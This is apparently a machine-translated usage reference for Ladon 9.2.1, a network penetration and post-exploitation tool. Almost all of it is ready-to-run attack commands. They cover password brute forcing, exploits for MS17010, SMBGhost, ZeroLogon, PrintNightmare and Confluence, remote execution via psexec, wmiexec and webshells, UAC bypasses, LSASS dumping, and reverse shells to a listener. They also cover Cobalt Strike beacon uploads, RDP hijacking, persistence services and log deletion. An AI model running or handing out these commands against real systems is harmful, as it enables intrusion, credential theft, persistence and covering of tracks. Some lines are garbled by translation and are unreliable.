Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale network penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch a segment / b segment / C segment and cross network segment scanning, as well as URL, host and domain name list scanning. Version 9.2.1 has 171 built-in functional modules and 18 external modules. It can quickly obtain the target network survival host IP, computer name, workgroup, shared resources, network card address, operating system version, website, subdomain name, middleware, open services, routers, databases and other information through a variety of protocols and methods. Vulnerability detection includes ms17010, smbghost, Weblogic, ActiveMQ, Tomcat, struts 2 series and so on, There are 13 kinds of password blasting including databases (mysql, Oracle, MSSQL), FTP, SSH, vnc, windows (LDAP, SMB / IPC, NBT, WMI, smbhash, wmihash, winrm), basicauth, Tomcat, Weblogic, rar, etc. the remote execution commands include (smbexec / wmiex / psexec / atexec / sshexec / jspshell), and the web fingerprint identification module can identify 75 kinds (web application, middleware, script type, page type), etc. it can be highly customized with plug-in POC support Net assembly, DLL (C # / Delphi / VC), PowerShell and other language plugins, support the batch call of any external program or command by configuring ini, and the exp generator can generate vulnerability POC at one click to quickly expand the scanning ability. Ladon supports the plug-in scanning of cobalt strike to quickly expand the intranet for horizontal movement.
New Version:https://k8gege.org/Download
All Version: https://github.com/k8gege/Ladon/releases/
Ladon concise use tutorial complete document: http://k8gege.org/Ladon Support CMD, shell, cobalt strike and PowerShell Windows version:. Net, cobalt strike, PowerShell Full system version: go (full platform), python (theoretically full platform) PS: the GUI version is mainly convenient for local testing, and CMD is used for complete functions
Ladon9.2.1 20220911
171 examples of concise usage
Example: scan the target 10.1.2 for ms17010 vulnerabilities
Single thread: Ladon 10.1.2.8/24 ms17010 t = 1
80 thread: Ladon noping 10.1.2.8/24 ms17010 t = 80
The network default thread under high-intensity protection cannot be scanned, and must be a single thread
Example: scan the target section 10.1.2 for ms17010 vulnerabilities (noping must be added)
Ladon noping 10.1.2.8/24 MS17010
See: http://k8gege.org/Ladon/proxy.html
CIDR format: not only / 24 / 16 / 8 (all)
Ladon 192.168.1.8/24 scanning module
Ladon 192.168.1.8/16 scanning module
Ladon 192.168.1.8/8 scanning module
Letter format: only section C, Section B and section a are sorted in order
Ladon 192.168.1.8/c scanning module
Ladon 192.168.1.8/b scanning module
Ladon 192.168.1.8/a scanning module
Ladon 192.168.1.50-192.168.1.200 ICMP ICMP detects the surviving hosts of segment 1 (50-200)
Ladon 192.168.1.30-192.168.50.80 ICMP ICMP probe 1.30 to 50.80 surviving hosts
Txt format
Ladon ip24.txt ICMP
Ladon ip16.txt ICMP
Ladon cidr. txt ICMP
Ladon domain. txt ICMP
Ladon host. txt ICMP
Ladon 192.168.1.8 whatcms scan IP
Ladon 192.168.1.8/24 whatcms scanning section C
Ladon 192.168.1.8/c whatcms scanning section C
Ladon 192.168.1.8/b whatcms scanning section B
Ladon 192.168.1.8/a whatcms scanning section a
Ladon IP. Txt whatcms scan IP list
Ladon ip24.txt whatcms scan C-segment list
Ladon ip16.txt whatcms scan segment B list
Ladon cidr. Txt whatcms scans the list of IP segments in the whole country
Disable Ping scanning
Ladon noping 192.168.1.8 whatcms scan IP
Ladon noping 192.168.1.8/24 whatcms scanning segment C
Ladon url. txt DraytekPoc
Ladon str.txt DeBase64
Ladon 192.168.1.8/24 ICMP
013 Ping detect the surviving host (call the system ping command to echo MS, TTL and other information)
Ladon 192.168.1.8/24 Ping
014 multi protocol probe surviving host (IP, machine name, MAC / domain name, manufacturer / system version)
Ladon 192.168.1.8/24 OnlinePC
015 multi protocol identification operating system (IP, machine name, operating system version, open service)
Ladon 192.168.1.8/24 OsScan
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
Ladon 192.168.1.8/24 DnsScan
Ladon 192.168.1.8/24 OnlineIP
019 scan SMB vulnerability ms17010 (IP, machine name, vulnerability number, operating system version)
Ladon 192.168.1.8/24 MS17010
020 smbghost vulnerability detection cve-2020-0796 (IP, machine name, vulnerability number, operating system version)
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WebScan
Ladon 192.168.1.8/24 UrlScan
Ladon 192.168.1.8/24 SameWeb
Ladon baidu. com SubDomain
Ladon baidu. com DomainIP
Ladon baidu. com HostIP
Ladon domain. txt DomainIP
Ladon host. txt HostIP
Ladon domain. txt Domain2IP
Ladon host. txt Host2IP
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
Ladon GetDomainIP
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
Ladon 192.168.1.8/24 WhatCMS
Ladon 192.168.1.8/24 CiscoScan
Ladon http://192.168.1.8 CiscoScan
Ladon EnumMssql
Ladon EnumShare
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 FtpScan
Brute force cracking / network authentication / weak password / password blasting / database / website background / login / system login
Refer to SSH for detailed explanation of password blasting: http://k8gege.org/Ladon/sshscan.html
Ladon 192.168.1.8/24 SmbScan
Ladon 192.168.1.8/24 WmiScan
Ladon 192.168.1.8/24 LdapScan
Ladon 192.168.1.8/24 WinrmScan.ini
Ladon 192.168.1.8/24 SmbHashScan
Ladon 192.168.1.8/24 WmiHashScan
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
Ladon 192.168.1.8/24 MssqlScan
Ladon 192.168.1.8/24 OracleScan
Ladon 192.168.1.8/24 MysqlScan
Ladon http://192.168.1.8:7001/console WeblogicScan
Ladon 192.168.1.8/24 WeblogicScan
Ladon 192.168.1.8/24 VncScan
Ladon 192.168.1.8/24 FtpScan
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
Ladon http://192.168.1.8/login HttpBasicScan
Ladon 192.168.1.8/24 SmbScan.ini
Ladon 192.168.1.8/24 IpcScan.ini
Ladon 192.168.1.8/24 NbtScan
Ladon 192.168.1.8/24 WinrmScan
Ladon 192.168.1.8/24 DvrScan
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WeblogicPoc
Ladon 192.168.1.8/24 PhpStudyPoc
Ladon 192.168.1.8/24 ActivemqPoc
Ladon 192.168.1.8/24 TomcatPoc
Ladon 192.168.1.8/24 Struts2Poc
062 draytekpoc (cve-2020-8515) vulnerability detection, DrayTek version detection, weak password detection
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
Ladon 192.168.1.8/24 WeblogicExp
Ladon 192.168.1.8/24 TomcatExp
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
Ladon DraytekExp http://192.168.1.8 whoami
Ladon ZeroLogon dc.k8gege.org
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 forexec circular vulnerability exploitation (win10 eternal black cve-2020-0796, exit successfully to avoid target blue screen)
Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
Ladon 123456 EnHex
Ladon 313233343536 DeHex
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
Ladon FtpSniffer 192.168.1.5
Ladon HTTPSniffer 192.168.1.5
Ladon Sniffer
Ladon IISpwd
Ladon WifiPwd
Ladon FileZillaPwd
Ladon CVE-2021-36934
Ladon DumpLsass
Ladon GetIP
Ladon GetID
Ladon Recent
Ladon UsbLog
Ladon CheckDoor
Ladon AutoRun
Ladon EnumProcess
Ladon Tasklist
Ladon cmdline
Ladon cmdline cmd.exe
Ladon GetInfo
Ladon GetInfo2
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
Ladon Ver
Ladon Version
Ladon AllVer
Ladon AllVersion
Ladon QueryProxy
Ladon dirlist default column (overall)
Ladon dirlist C: \ specify the drive letter or directory
Ladon QueryAdmin
Ladon GetPipe
Ladon RdpLog
net user \192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
Ladon wmiexec 192.168.1.8 k8gege k8ge520 whoamI (usage before 8.2)
Ladon wmiexec 192.168.1.8 k8gege k8ge520 CMD whoamI (usage after 8.2)
Ladon wmiexec 192.168.1.8 k8gege k8ge520 b64cmd d2hvyw1p (usage after 8.2)
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
Usage:
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon. exe ceacon.exe
Ladon WmiExec2 pth host upload beacon. exe ceacon.exe
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
Ladon WinrmExec 192.168.1.8 5985 k8gege. org Administrator K8gege520 calc.exe
Ladon whoami
Usage: Ladon bypassuac method base64cmd
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
Ladon SpoolFool poc.dll
Ladon CVE-2022-21999 poc.dll
Ladon GetSystem cmd.exe
Ladon GetSystem cmd. exe explorer
Ladon Runas user pass cmd
Ladon ms16135 whoami
Ladon BadPotato cmdline
Ladon SweetPotato cmdline
Ladon EfsPotato whoami
Ladon Open3389
Ladon ActiveAdmin
Ladon ActiveGuest
Ladon ReverseTcp 192.168.1.8 4444 nc
Ladon ReverseTcp 192.168.1.8 4444 shell
Ladon ReverseTcp 192.168.1.8 4444 meter
Ladon ReverseHttp 192.168.1.8 4444
Ladon ReverseHttps 192.168.1.8 4444
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
Ladon netsh add 888 192.168.1.112 22
VPS monitoring: Ladon porttran 8000 338
Target forwarding: Ladon porttran intranet IP 3389 VPS_ IP 8000
Local connection: mstsc VPS_ IP:338
Ladon RdpHijack 3
Ladon RdpHijack 3 console
Ladon RegAuto Test c:\123.exe
Ladon at c:\123.exe
Ladon at c:\123.exe gui
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
Ladon 192.168.1.8/24 SnmpScan
Ladon 192.168.1.8/24 NbtInfo
Ladon 192.168.1.8/24 SmbInfo
Ladon 192.168.1.8/24 WmiInfo
Ladon 192.168.1.8/24 MssqlInfo
Ladon 192.168.1.8/24 WinrmInfo
Ladon 192.168.1.8/24 ExchangeInfo
For single thread: Ladon 192.168.1.8/24 rdpinfo f = 1
Ladon EnableDotNet
Ladon gethtml http://192.168.1.1
Ladon web 80
Ladon web 80 dir
Get the IP of the external network (start the web on the VPS, and the target access is ip.txt or ip.jpg)
Monitoring Ladon web 800
Submit return clear text
certutil. exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
Base64 encryption result
certutil. exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64 result decryption
certutil. exe -urlcache -split - fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
Ladon 192.168.1.8/24 IsShiro
Ladon LogDelTomcat access. log 192.168.1.8
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
Ladon readfile C: \ k8.exe (default 1K)
Ladon ReadFile c:\k8.exe 1K
Ladon ReadFile c:\k8.exe 1024K
Ladon ReadFile c:\k8.exe 1M
Ladon SetMzLogonPwd 1
Ladon SetSignAuth 1
Ladon ip. txt IP24
Ladon ip. txt IPC
Ladon ip. txt IPB
Ladon url. txt CVE-2022-26134
Ladon EXP-2022-26134 https://111.229.255.81 id
Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort
Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444
160 ssslinfo certificate: detect equipment, IP, domain name, machine name, organization and other information
Ladon https://k8gege.org SslInfo
Ladon k8gege. org SslInfo
Ladon k8gege. Org: 443 sslenfo specifies the port
Ladon noping fbi. Gov ssslinfo forbids Ping detection
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 ssslinfo certificate: batch detection of equipment, IP, domain name, machine name, organization and other information
Ladon ip. txt SslInfo
Ladon url. txt SslInfo
Ladon 192.168.1.1/c SslInfo
Ladon 192.168.1.1/b SslInfo
Ladon https://k8gege.org WPinfo
Ladon k8gege. org WPinfo
Ladon noping fbi. Gov wpinfo disable Ping detection
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
Ladon ip. txt WPinfo
Ladon url. txt WPinfo
Ladon 192.168.1.1/c WPinfo
Ladon 192.168.1.1/b WPinfo
Ladon k8gege. org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
Ladon 192.168.1.8 CVE-2022-27925
Ladon http://zimbra.k8gege.org CVE-2022-27925
Ladon ip. txt CVE-2022-27925
Ladon url. txt CVE-2022-27925
Ladon 192.168.1.1/c CVE-2022-27925
Ladon 192.168.1.1/b CVE-2022-27925
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami
Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
Ladon FindIP ipc. txt ISVUL.txt
Ladon https://192.168.1.8 CiscoDump
Ladon url. Txt Cisco dump bulk detect Cisco vulnerabilities and export user passwords
http://k8gege.org/Ladon/example-en.html
Latest version in small seal ring: http://k8gege.org/Ladon/update.txt